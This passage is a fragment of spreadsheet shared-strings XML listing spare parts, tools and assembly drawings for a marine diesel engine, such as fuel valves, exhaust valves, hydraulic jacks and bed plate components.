    <t>DISTANCE PIECE FOR VIBRATION ISOLATING STAY</t>
  </si>
  <si>
    <t>SHIM FOR VIBRATION ISOLATING STAY</t>
  </si>
  <si>
    <t>REAMER BOLT FOR VIBRATION ISOLATING STAY</t>
  </si>
  <si>
    <t>BOLT FOR VIBRATION ISOLATING STAY</t>
  </si>
  <si>
    <t>T/C EXH. GAS OUTLET PIPE</t>
  </si>
  <si>
    <t>BELLOWS</t>
  </si>
  <si>
    <t>PANEL  FOR AIR SOURCE PANEL</t>
  </si>
  <si>
    <t>PRESSURE REGULATING SPRING</t>
  </si>
  <si>
    <t>VALVE GUIDE ASSEMBLY</t>
  </si>
  <si>
    <t>PRESSURE GAUGE ADAPTER ASSEMBLY</t>
  </si>
  <si>
    <t>LOCK NUT</t>
  </si>
  <si>
    <t>HANDLE ASSEMBLY</t>
  </si>
  <si>
    <t>STARTING AIR SAFETY VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>VALVE BODY  FOR STARTING AIR SAFETY VALVE</t>
  </si>
  <si>
    <t>SPRING  FOR STARTING AIR SAFETY VALVE</t>
  </si>
  <si>
    <t>BUSHING  FOR AIR SOURCE PANEL</t>
  </si>
  <si>
    <t>EXHAUST VALVE SPINDLE &amp; SEAT GRINDING MACHINE</t>
  </si>
  <si>
    <t>DRAINER FOR SCAVENGING AIR TRUNK</t>
  </si>
  <si>
    <t>O RING  FOR CYLINDER LINER</t>
  </si>
  <si>
    <t>O RING  FOR CYLINDER HEAD</t>
  </si>
  <si>
    <t>WATER JACKET  FOR CYLINDER HEAD</t>
  </si>
  <si>
    <t>BOLT  FOR EXHAUST VALVE CAGE</t>
  </si>
  <si>
    <t>BOLT  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>BOLT  FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>NUT  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>CAP  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>PIN  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>DISTANCE PIECE  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>FITTING PIECE FOR INDICATOR VALVE</t>
  </si>
  <si>
    <t>PLUG  FOR INDICATOR VALVE</t>
  </si>
  <si>
    <t>NOZZLE  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>CAP NUT  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>GUIDE  FOR FUEL VALVE (1)</t>
  </si>
  <si>
    <t>GUIDE  FOR FUEL VALVE (2)</t>
  </si>
  <si>
    <t>SPINDLE  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>SPRING  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>SPRING RETAINER  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>ADJUSTING SCREW  FOR FULE VALVE</t>
  </si>
  <si>
    <t>NUT  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>CONNECTING BRANCH  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>AIR VENT VALVE FOR FUEL VALVE</t>
  </si>
  <si>
    <t>STEEL BALL  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>HOUSING  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>GUIDE BUSH  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>RETAINER  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>SIGHT GLASS  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>PISTON RING  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>EXHAUST VALVE ASSEMBLY (1)</t>
  </si>
  <si>
    <t>EXHAUST VALVE CAGE</t>
  </si>
  <si>
    <t>AIR CYLINDER  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>AIR PISTON  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>COTTER  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>STEM GUIDE  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>VALVE STEM  FOR EXH. VALVE</t>
  </si>
  <si>
    <t>SUPPORT BOLT  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>BOLT  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>CAP SEAL  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>OIL SUPPLY BOLT  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>STOPPER PLATE  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>BODY  FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>VALVW STEM  FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>PISTON  FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>COVER  FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>SPRING  FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>GASKET  FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>ASSEMBLY.CYLINDER SAFETY VALVE</t>
  </si>
  <si>
    <t>VALVE BODY FOR INDICATOR VALVE</t>
  </si>
  <si>
    <t>SEAT FOR INDICATOR VALVE</t>
  </si>
  <si>
    <t>STUD BOLT (CYLINDER HEAD)</t>
  </si>
  <si>
    <t>NUT  FOR CYLINDER JACKET</t>
  </si>
  <si>
    <t>METAL  FOR CRANK PIN BEARING (LOWER)</t>
  </si>
  <si>
    <t>BOLT  FOR CRANK PIN BEARING</t>
  </si>
  <si>
    <t>METAL  FOR CROSS HEAD PIN BEARING</t>
  </si>
  <si>
    <t>BOLT  FOR CROSS HEAD PIN BEARING</t>
  </si>
  <si>
    <t>BOLT  FOR PISTON</t>
  </si>
  <si>
    <t>NUT  FOR PISTON</t>
  </si>
  <si>
    <t>INNER PIPE  PISTON ROD</t>
  </si>
  <si>
    <t>BOLT  FOR INNER PIECE</t>
  </si>
  <si>
    <t>OIL RING  FOR STUFFING BOX</t>
  </si>
  <si>
    <t>INNER PIPE  FOR PISTON COOLING SYSTEM</t>
  </si>
  <si>
    <t>GASKET  FOR CYLINDER LO. STUD</t>
  </si>
  <si>
    <t>FUEL INJECTION PIPE ASSEMBLY PUMP SIDE  INTERNAL DIAMETER4MM</t>
  </si>
  <si>
    <t>FUEL INJECTION PIPE BRANCH PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>SPARE PART BOX ASSEMBLY</t>
  </si>
  <si>
    <t>RATCHET HANDLE</t>
  </si>
  <si>
    <t>DEPTH GAUGE</t>
  </si>
  <si>
    <t>HYDRAULIC JACK ASSEMBLY (CRANK PIN)</t>
  </si>
  <si>
    <t>CYLINDER  FOR HYDRAULIC JACK (CRANK PIN)</t>
  </si>
  <si>
    <t>PISTON  FOR HYDRAULIC JACK (CRANK PIN)</t>
  </si>
  <si>
    <t>TENSION NUT  FOR HYDRAULIC JACK (CRANK PIN)</t>
  </si>
  <si>
    <t>BAR  FOR HYDRAULIC JACK</t>
  </si>
  <si>
    <t>AIR VENT PLUG FOR EXHAUST VALVE HYDRAULIC JACK</t>
  </si>
  <si>
    <t>LIFTING PIECE FOR MAIN BEARING CAP OVERHAUL TOOL</t>
  </si>
  <si>
    <t>LEVER  FOR MAIN BEARING CAP OVER HAUL TOOL</t>
  </si>
  <si>
    <t>LIFTING SUPPORT PLATE FOR CONNECTING ROD</t>
  </si>
  <si>
    <t>LIFTING SUPPORT PLATE FOR MAIN BEARING CAP OVERHAUL TOOL</t>
  </si>
  <si>
    <t>PIN  FOR MAIN BEARING CAP OVER HAUL TOOL</t>
  </si>
  <si>
    <t>WIRE ROPE  FOR MAIN BEARING CAP OVER HAUL TOOL</t>
  </si>
  <si>
    <t>PIN  FOR MAIN BEARING METAL OVER HAUL TOOL</t>
  </si>
  <si>
    <t>LIFT TOOL  FOR MAIN BEARING METAL OVER HAUL TOOL</t>
  </si>
  <si>
    <t>TAKE OFF TOOL  FOR THRUST PAD OVER HAUL TOOL</t>
  </si>
  <si>
    <t>BRACKET  FOR THRUST PAD OVER HAUL TOOL</t>
  </si>
  <si>
    <t>ROLLER  FOR THRUST PAD OVER HAUL TOOL</t>
  </si>
  <si>
    <t>BOLT  FOR THRUST PAD OVER HAUL TOOL</t>
  </si>
  <si>
    <t>WASHER  FOR THRUST PAD OVER HAUL TOOL</t>
  </si>
  <si>
    <t>WIRE ROPE  FOR CYLINDER LINER OVER HAUL TOOL</t>
  </si>
  <si>
    <t>LIFTING PIECE  FOR CRANK PIN BEARING TOOL</t>
  </si>
  <si>
    <t>BOX (UPPER)  FOR CYLINDER LINER OVER HAUL TOOL</t>
  </si>
  <si>
    <t>BOX (LOWER)  FOR CYLINDER LINER OVER HAUL TOOL</t>
  </si>
  <si>
    <t>BOLT  FOR CYLINDER LINER OVER HAUL TOOL</t>
  </si>
  <si>
    <t>JACK BOLT  FOR CYLINDER LINER WATER JACKET OVERHAUL TOOL</t>
  </si>
  <si>
    <t>CYLINDER LINER WOODEN COVER FOR PISTON</t>
  </si>
  <si>
    <t>BORE GAUGE</t>
  </si>
  <si>
    <t>MASTER GAUGE  FOR CYLINDER LINER MEASURING TOOL</t>
  </si>
  <si>
    <t>LINER GAUGE  FOR CYLINDER LINER MEASURING TOOL</t>
  </si>
  <si>
    <t>HYDRAULIC JACK ASSEMBLY (CYLINDER HEAD)</t>
  </si>
  <si>
    <t>CYLINDER  FOR HYDRAULIC JACK (CYLINDER HEAD)</t>
  </si>
  <si>
    <t>PISTON  FOR HYDRAULIC JACK (CYLINDER HEAD)</t>
  </si>
  <si>
    <t>TENSION NUT  FOR HYDRAULIC JACK (CYLINDER HEAD)</t>
  </si>
  <si>
    <t>FOOT PIECE  FOR HYDRAULIC JACK (CYLINDER HEAD)</t>
  </si>
  <si>
    <t>LIFTING UP TOOL FOR CYLINDER COVER</t>
  </si>
  <si>
    <t>LIFTING PIECE  FOR CYLINDER COVER</t>
  </si>
  <si>
    <t>HANDLE  FOR FUEL VALVE SEAT RAPPING TOOL</t>
  </si>
  <si>
    <t>LAPPING PLATE  FOR VALVE SEAT LAPPING TOOL</t>
  </si>
  <si>
    <t>HANDLE  FOR VALVE SEAT LAPPING TOOL</t>
  </si>
  <si>
    <t>MEASURING TOOL  FOR PISTON RING GROOVE</t>
  </si>
  <si>
    <t>COVER  FOR PISTON TEST TOOL</t>
  </si>
  <si>
    <t>FIGURE GAUGE FOR PISTON HEAD</t>
  </si>
  <si>
    <t>GAUGE  FOR STUFFING BOX</t>
  </si>
  <si>
    <t>CENTERING TOOL FOR PISTON COOLING OIL PIPE</t>
  </si>
  <si>
    <t>SUPPORT  FOR STUFFING BOX TOOL</t>
  </si>
  <si>
    <t>PRESSURE GAUGE  FOR HYDRAULIC PUMP</t>
  </si>
  <si>
    <t>HOSE  FOR HYDRAULIC PUMP</t>
  </si>
  <si>
    <t>SOCKET  FOR HYDRAULIC PUMP</t>
  </si>
  <si>
    <t>Y TYPE CHEESE  FOR HYDRAULIC PUMP</t>
  </si>
  <si>
    <t>COUPLER  FOR HYDRAULIC PUMP</t>
  </si>
  <si>
    <t>PLUG  FOR CYLINDER CUT TOOL (STARTING VALVE)</t>
  </si>
  <si>
    <t>COVER  FOR CYLINDER CUT TOOL (STARTING VALVE)</t>
  </si>
  <si>
    <t>COVER  FOR CYLINDER CUT TOOL (STUFFING BOX)</t>
  </si>
  <si>
    <t>GASKET  FOR CYLINDER CUT TOOL (STUFFING BOX)</t>
  </si>
  <si>
    <t>COVER  FOR CYLINDER CUT TOOL (PISTON ROD)</t>
  </si>
  <si>
    <t>GASKET  FOR CYLINDER CUT TOOL (PISTON ROD)</t>
  </si>
  <si>
    <t>COVER  FOR CYLINDER CUT TOOL</t>
  </si>
  <si>
    <t>JACK BOLT  FOR CROSS HEAD PIN TOOL</t>
  </si>
  <si>
    <t>LIFTING TOOL  FOR CONNECTING ROD</t>
  </si>
  <si>
    <t>LIFTING TOOL  FOR CONNECTING ROD TOOL</t>
  </si>
  <si>
    <t>STOPPER  FOR CONNECTING ROD TOOL</t>
  </si>
  <si>
    <t>LIMIT GAUGE  FOR FOV. NOZZLE TIP</t>
  </si>
  <si>
    <t>TESTING TABLE FOR FUEL VALVE</t>
  </si>
  <si>
    <t>STAND  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>TESTING PIPE FOR FUEL VALVE</t>
  </si>
  <si>
    <t>FIGURE GAUGE FOR NOZZLE TIP</t>
  </si>
  <si>
    <t>WEAR LIMIT GAUGE VALVE STEM&amp;SEAT</t>
  </si>
  <si>
    <t>STAND  FOR EXHAUST VALVE OVERHAUL TOOL</t>
  </si>
  <si>
    <t>PLATE  FOR EXHAUST VALVE OVERHAUL STAND</t>
  </si>
  <si>
    <t>SHAFT  FOR EXHAUST VALVE OVERHAUL STAND</t>
  </si>
  <si>
    <t>BOLT  FOR STARTING VALVE LIFTING TOOL</t>
  </si>
  <si>
    <t>HANDLE  FOR LAPPING HANDLE</t>
  </si>
  <si>
    <t>WASHER  FOR LAPPING HANDLE</t>
  </si>
  <si>
    <t>TESTING TOOL FOR PRESSURE OF FUEL VALVE</t>
  </si>
  <si>
    <t>SOCKET FOR FO PUMP TEST TOOL</t>
  </si>
  <si>
    <t>HANDLE  FOR FO. PUMP PRIMING</t>
  </si>
  <si>
    <t>HANDLE  FOR FO. PUMP CUT TOOL</t>
  </si>
  <si>
    <t>FILTER FOR T/C.A/B. CUT TOOL</t>
  </si>
  <si>
    <t>BLANK PLATE  FOR T/C. A/B. CUT TOOL</t>
  </si>
  <si>
    <t>HANDLE FOR INDICATOR VALVE</t>
  </si>
  <si>
    <t>SOCKET FOR PRESSURE OF CYLINNDER SAFETY VALVE</t>
  </si>
  <si>
    <t>BOX SPANNER  FOR EXHAUST VALVE TOOL</t>
  </si>
  <si>
    <t>SPANNER  FOR OUTLET PIPE (PISTON COOLING)</t>
  </si>
  <si>
    <t>LAPPING PLATE</t>
  </si>
  <si>
    <t>HYDRAULIC JACK ASSEMBLY</t>
  </si>
  <si>
    <t>CYLINDER  FOR HYDRAULIC JACK (TIE BOLT)</t>
  </si>
  <si>
    <t>PISTON  FOR HYDRAULIC JACK (TIE BOLT)</t>
  </si>
  <si>
    <t>TENSION NUT  FOR HYDRAULIC JACK (TIE BOLT)</t>
  </si>
  <si>
    <t>FOOT PIECE  FOR HYDRAULIC JACK</t>
  </si>
  <si>
    <t>AIR RELEASE FOR AUTOMATIC STOP VALVE</t>
  </si>
  <si>
    <t>BACK UP RING</t>
  </si>
  <si>
    <t>CONICAL SPRING WASHERS</t>
  </si>
  <si>
    <t>COPPER GASKET</t>
  </si>
  <si>
    <t>CRANK SHAFT</t>
  </si>
  <si>
    <t>DEFLECTOR</t>
  </si>
  <si>
    <t>DOUBLE ENDED SPANNERS</t>
  </si>
  <si>
    <t>FUEL VALVE SPRING RETAINER</t>
  </si>
  <si>
    <t>GREASE NIPPLES</t>
  </si>
  <si>
    <t>HEXAGON HEAD BOLTS</t>
  </si>
  <si>
    <t>HEXAGON SOCKET HEAD PLUGS</t>
  </si>
  <si>
    <t>HEXAGON SOCKET SET SCREWS</t>
  </si>
  <si>
    <t>JACK BOLT</t>
  </si>
  <si>
    <t>MACHINE SCREW</t>
  </si>
  <si>
    <t>PARALLEL PINS</t>
  </si>
  <si>
    <t>PARALLEL PINS WITH TAPPED HOLE</t>
  </si>
  <si>
    <t>PLAIN WASHERS</t>
  </si>
  <si>
    <t>PLIER</t>
  </si>
  <si>
    <t>POINTER CASE</t>
  </si>
  <si>
    <t>RESISTANCE BULB</t>
  </si>
  <si>
    <t>RETAINING RINGS(UNIFORM SECTION C TYPE)</t>
  </si>
  <si>
    <t>SCREWED BOSSES</t>
  </si>
  <si>
    <t>SINGLE ENDED SPANNERS</t>
  </si>
  <si>
    <t>SPLIT TAPER PINS</t>
  </si>
  <si>
    <t>SPRING LOCK WASHERS</t>
  </si>
  <si>
    <t>SPRING RETAINER  FOR AUTOMATIC STOP VALVE</t>
  </si>
  <si>
    <t>STEEL BALLS FOR BALL BEARINGS</t>
  </si>
  <si>
    <t>TAPER PINS WITH NUT</t>
  </si>
  <si>
    <t>TONGUED WASHERS</t>
  </si>
  <si>
    <t>VALVE SEAT  FOR EXH. VALVE</t>
  </si>
  <si>
    <t>BUTT WELD PIPE JOINTS OF ELBOW TYPE</t>
  </si>
  <si>
    <t>PLUNGER ASSEMBLY A-ZONE "D202"</t>
  </si>
  <si>
    <t>BRACKET  FOR FUEL OIL PIPE (INLET)</t>
  </si>
  <si>
    <t>SHIM  FOR MAIN BEARING</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>U-NUT</t>
  </si>
  <si>
    <t>HEXAGON HEAD PLUGS</t>
  </si>
  <si>
    <t xml:space="preserve">EXHAUST VALVE O RING </t>
  </si>
  <si>
    <t>BUSING FOR STARTING AIR SYSTEM</t>
  </si>
  <si>
    <t>REMOTE CONTROL PARTS</t>
  </si>
  <si>
    <t>STARTER FOR MAIN ENGINE TURNING MOTOR</t>
  </si>
  <si>
    <t>AUXILIARY BLOWER STARTER</t>
  </si>
  <si>
    <t>ASSEMBLY.BED PLATE</t>
  </si>
  <si>
    <t>BED PLATE ASSEMBLY</t>
  </si>
  <si>
    <t>BED PLATE WELDING DRAWING</t>
  </si>
  <si>
    <t>END BEARING GIRDER (DRIVING END)</t>
  </si>
  <si>
    <t>NORMAL BEARING GIRDER (MEDIUM PART)</t>
  </si>
  <si>
    <t>END BEARING GIRDER (FREE END)</t>
  </si>
  <si>
    <t>PLATE WELDING DRAWING</t>
  </si>
  <si>
    <t>PLATE FOR BED PLATE</t>
  </si>
  <si>
    <t>CUTTING PLAN FOR BED PLATE</t>
  </si>
  <si>
    <t>BED PLATE MACHINING</t>
  </si>
  <si>
    <t>BED PLATE LUB. OIL OUTLET</t>
  </si>
  <si>
    <t>STAINLESS PLATE</t>
  </si>
  <si>
    <t>BEARING SHELL (UPPER)</t>
  </si>
  <si>
    <t>BEARING SHELL (LOWER)</t>
  </si>
  <si>
    <t>THRUST BEARING ASSEMBLY</t>
  </si>
  <si>
    <t>THRUST PAD FOR AFT SIDE</t>
  </si>
  <si>
    <t>OIL SCRAPER</t>
  </si>
  <si>
    <t>OIL BAFFLE (UPPER) FOR THRUST BEARING</t>
  </si>
  <si>
    <t>OIL BAFFLE (LOWER) FOR THRUST BEARING</t>
  </si>
  <si>
    <t>HEXAGON SOCKET HEAD CAP SCREW FOR THRUST BEARING</t>
  </si>
  <si>
    <t>TAPER PIN FOR THRUST BEARING</t>
  </si>
  <si>
    <t>END CASING</t>
  </si>
  <si>
    <t>CASING UPPER PART MACHINING DRAWING</t>
  </si>
  <si>
    <t>CASING LOWER PART MACHINING DRAWING</t>
  </si>
  <si>
    <t>DIAL THERMOMETER ARRANGEMENT</t>
  </si>
  <si>
    <t>THERMOMETER FITTING PIECE</t>
  </si>
  <si>
    <t>TAPER PIN FOR ENGINE FRAME ASSEMBLY PARTS</t>
  </si>
  <si>
    <t>COLUMN ASSEMBLY</t>
  </si>
  <si>
    <t>MONOBLOCK COLUMN WELDING DRAWING</t>
  </si>
  <si>
    <t>MONOBLOCK COLUMN WELDING DRAWING / PART 1</t>
  </si>
  <si>
    <t>MONOBLOCK COLUMN WELDING DRAWING / PART 1A</t>
  </si>
  <si>
    <t>MONOBLOCK COLUMN WELDING DRAWING / PART 2</t>
  </si>
  <si>
    <t>MONOBLOCK COLUMN WELDING DRAWING / PART 7</t>
  </si>
  <si>
    <t>PLATE ON MONOBLOCK COLUMN</t>
  </si>
  <si>
    <t>FRAONT PLATE</t>
  </si>
  <si>
    <t>PLATE ON MONO BLOCK COLUMN</t>
  </si>
  <si>
    <t>COVER PLATE ON MONO BLOCK COLUMN</t>
  </si>
  <si>
    <t>SUPPORT ASSEMBLY</t>
  </si>
  <si>
    <t>WELDING DRAWING FOR PLATES OF COLUMN</t>
  </si>
  <si>
    <t>CUTTING PLAN ON MONO BLOCK COLUMN</t>
  </si>
  <si>
    <t>MONOBLOCK COLUMN MACHINING              (HYDRAULIC GOVERNOR SPEC</t>
  </si>
  <si>
    <t>RELIEF VALVE COLUMN DIFFERENT MANUFACTURER</t>
  </si>
  <si>
    <t>ARRANGEMENT OF COLUMN DOORS</t>
  </si>
  <si>
    <t>CHAIN FOR COLUMN DOOR</t>
  </si>
  <si>
    <t>BUSH FOR TIE BOLT</t>
  </si>
  <si>
    <t>STUD BOLT FOR CYLINDER COVER</t>
  </si>
  <si>
    <t>CYLINDR LINER ASSEMBLY</t>
  </si>
  <si>
    <t>D RING</t>
  </si>
  <si>
    <t>HOLDER FOR CYLINDER LINER</t>
  </si>
  <si>
    <t>POSITIONING PAD FOR SYLINDER LINER</t>
  </si>
  <si>
    <t>WATER GUIDE JACKET ASSEMBLY</t>
  </si>
  <si>
    <t>WATER JACKET</t>
  </si>
  <si>
    <t>HOLDER FOR WATER GUIDE JACKET</t>
  </si>
  <si>
    <t>TUBE FOR WATER GUIDE JACKET</t>
  </si>
  <si>
    <t>RETAINING SCREW FOR WATER GUIDE JACKET</t>
  </si>
  <si>
    <t>UPPER INSUL. BANDAGE CYL. LINER</t>
  </si>
  <si>
    <t>TEFLON STRIP FOR UPPER INSUL. BANDAGE</t>
  </si>
  <si>
    <t>WASHER FOR UPPER INSUL. BANDAGE CYL. LINER</t>
  </si>
  <si>
    <t>STUD BOLT FOR FUEL VALVE</t>
  </si>
  <si>
    <t>STUD BOLT FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>FUEL VALVE SPRING BOX</t>
  </si>
  <si>
    <t>DISC SPRING FOR TIGHTING FUEL VALVE</t>
  </si>
  <si>
    <t>WASHER FOR FUEL VALVE</t>
  </si>
  <si>
    <t>PARALLEL PIN</t>
  </si>
  <si>
    <t>NOZZLE HOLDER FOR FULE INJECTION VALVE</t>
  </si>
  <si>
    <t>CAP NUT FOR NOZZLE</t>
  </si>
  <si>
    <t>SPINDLE FOR FUEL INJECTION VALVE</t>
  </si>
  <si>
    <t>ADJUST BOLT FOR FUEL VALVE</t>
  </si>
  <si>
    <t>FUEL PIPE CONNECTING BRANCH FOR FUEL INJECTION VALVE</t>
  </si>
  <si>
    <t>AIR VENT VALVE FOR FUEL INJECTION VALVE</t>
  </si>
  <si>
    <t>SPRING RETAINER (LOWER) FOR FUEL INJECTION VALVE</t>
  </si>
  <si>
    <t>SPINDLE GUIDE (UPPER) FOR FUEL INJECTION VALVE</t>
  </si>
  <si>
    <t>NOZZLE ASSEMBLY FOR FUEL INJECTION VALVE</t>
  </si>
  <si>
    <t>NOZZLE HOLDER  FUEL VALVE</t>
  </si>
  <si>
    <t>NEEDLE FOR FUEL VALVE</t>
  </si>
  <si>
    <t>SPRING FOR FUEL INJECTION VALVE</t>
  </si>
  <si>
    <t>SPINDLE GUIDE (LOWER) FOR FUEL INJECTION VALVE</t>
  </si>
  <si>
    <t>NUT FOR FUEL INJECTION VALVE</t>
  </si>
  <si>
    <t>DOWEL PIN  FOR FUEL VALVE</t>
  </si>
  <si>
    <t>GASKET FOR FUEL VALVE</t>
  </si>
  <si>
    <t>EXHAUST VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>VALVE CAGE MACHINING</t>
  </si>
  <si>
    <t>VALVE CAGE FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>VALVE STEM  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>STEM GUIDE FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>RETAINER FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>COTTER ASSEMBLY FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>AIR SPRING PISTON FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>AIR SPRING CYLINDER FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>STUD BOLT FOR EXHAUST VALVE DRIVING GEAR UPPER PART</t>
  </si>
  <si>
    <t>CAP SEAL FOR EXHAUST VALVE (STEM GUIDE)</t>
  </si>
  <si>
    <t>CAP SEAL FOR EXHAUST VALVE (AIR SPRING PISTON)</t>
  </si>
  <si>
    <t>SIGHT GLASS FOR EXHAUST VALVE DRIVING GEAR UPPER PART</t>
  </si>
  <si>
    <t>THROTTLE PIECE FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>HOUSING FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>VALVE STEM  FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>PISTON FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>COVER FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>SPRING FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>SPECIAL BOLT FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>GASKET FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>CLAW WASHER FOR STARTING AIR VALVE</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR UPPER PART ASSEMBLY</t>
  </si>
  <si>
    <t>PISTON FOR EXHAUST VALVE DRIVING GEAR UPPER PART</t>
  </si>
  <si>
    <t>ORIFICE ASSEMBLY FOR EXHAUST VALVE DRIVING GEAR UPPER PART</t>
  </si>
  <si>
    <t>ORIFICE SET BOLT FOR EXHAUST VALVE DRIVING GEAR UPPER PART</t>
  </si>
  <si>
    <t>ORIFICE NOZZLE FOR EXHAUST VALVE DRIVING GEAR UPPER PART</t>
  </si>
  <si>
    <t>STOPPER PLATE FOR EXHAUST VALVE DRIVING GEAR UPPER PART</t>
  </si>
  <si>
    <t>SCAVENGING AIR TRUNK ASSEMBLY</t>
  </si>
  <si>
    <t>FLOOR PLATE</t>
  </si>
  <si>
    <t>SCAVENGING AIR TRUNK MACHINING</t>
  </si>
  <si>
    <t>SCAVENGING AIR DUCT ASSEMBLY</t>
  </si>
  <si>
    <t>CHARGING UNIT MACHINING DRAWING</t>
  </si>
  <si>
    <t>CHARGING UNIT WELDING DRAWING</t>
  </si>
  <si>
    <t>PALTE</t>
  </si>
  <si>
    <t>FITTING BASE FOR CONTROL AIR SUPPLY UNIT</t>
  </si>
  <si>
    <t>MANO METER FOR AIR CIILER AIR SIDE      SUPPORT</t>
  </si>
  <si>
    <t>10K WELDING PIPE FLANGES</t>
  </si>
  <si>
    <t>WATER SEPARATOR SCAVENGING AIR</t>
  </si>
  <si>
    <t>AUXILIARY BLOWER ARRANGEMENT DRAWING</t>
  </si>
  <si>
    <t>AUX. BLOWER  (TAE-IL BLOWER MFG CO LTD</t>
  </si>
  <si>
    <t>WELDING FLANGE OF DIFFERENT DIAMETER</t>
  </si>
  <si>
    <t>MAIN PIPE OF FIRE EXTINGUISHING STEAM ASSEMBLY</t>
  </si>
  <si>
    <t>MAIN PIPE OF EXTINGUISHING STEAM</t>
  </si>
  <si>
    <t>EXHAUST PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>EXHAUST MANIFOLD MACHINING DRAWING</t>
  </si>
  <si>
    <t>EXHAUST MANIFOLD WELDING DRAWING</t>
  </si>
  <si>
    <t>SCREWED BOSS</t>
  </si>
  <si>
    <t>THREAD END TAPER PIN</t>
  </si>
  <si>
    <t>TURBOCHARGER ORDER DRAWING</t>
  </si>
  <si>
    <t>UPPER SUPPORT (DRIVING END SIDE)</t>
  </si>
  <si>
    <t>UPPER SUPPORT (CAMSHAFT SIDE)</t>
  </si>
  <si>
    <t>UPPER SUPPORT (CAM SHAFT SIDE)</t>
  </si>
  <si>
    <t>UPPER SUPPORT</t>
  </si>
  <si>
    <t>UPPER SUPPORT (EXHAUST SIDE)</t>
  </si>
  <si>
    <t>UPPER SUPPORT (FREE END SIDE)</t>
  </si>
  <si>
    <t>FOOT PLATE ARRANGEMENT UPPER SUPPORT</t>
  </si>
  <si>
    <t>FOOT PLATE (FREE END SIDE)</t>
  </si>
  <si>
    <t>BRACKET FOR FOOT PLATE HAND RAIL</t>
  </si>
  <si>
    <t>HANDRAIL FITTING ARRANGEMENT UPPER SUPPORT</t>
  </si>
  <si>
    <t>JOINT PIPE</t>
  </si>
  <si>
    <t>FOOT PLATE ARRANGEMENT LOWER SUPPORT</t>
  </si>
  <si>
    <t>LADDER ARRANGEMENT (CAMSHAFT SIDE)</t>
  </si>
  <si>
    <t>LADDER OF INSPECTION FOR AIR DACT EXHAYST SIDE</t>
  </si>
  <si>
    <t>LOWER SUPPORT A</t>
  </si>
  <si>
    <t>LOWER SUPPORT F</t>
  </si>
  <si>
    <t>HANDRAIL FITTING ARRANGEMENT LOWER SUPPORT</t>
  </si>
  <si>
    <t>CROSSHEAD ASSEMBLY</t>
  </si>
  <si>
    <t>CROSSHEAD PIN FOR CROSS HEAD</t>
  </si>
  <si>
    <t>GUIDE SHOE FOR CLOCKWISE ROTATAING</t>
  </si>
  <si>
    <t>SHIM  FOR CROSS HEAD</t>
  </si>
  <si>
    <t>INSERT PLUG WITH FLANGE (METRIC FINE THREAD)</t>
  </si>
  <si>
    <t>O RING  FOR PISTON</t>
  </si>
  <si>
    <t>D-RING FOR PISTON</t>
  </si>
  <si>
    <t>D RING  FOR PISTON</t>
  </si>
  <si>
    <t>PISTON ROD  FOR PISTON</t>
  </si>
  <si>
    <t>PISTON ROD STUFFING BOX ASSEMBLY</t>
  </si>
  <si>
    <t>TOP RING UNIT</t>
  </si>
  <si>
    <t>O RING FOR PISTON ROD STUFFING BOX</t>
  </si>
  <si>
    <t>PISTON COOLING SYSTEM ASSEMBLY</t>
  </si>
  <si>
    <t>CONICAL SPRING WASHER</t>
  </si>
  <si>
    <t>HEXAGON SOCKET HEAD PLUG</t>
  </si>
  <si>
    <t>GASKET FOR PISTON COOLING DEVICE</t>
  </si>
  <si>
    <t>CAM SHAFT CRIVING GEAR ASSEMBLY</t>
  </si>
  <si>
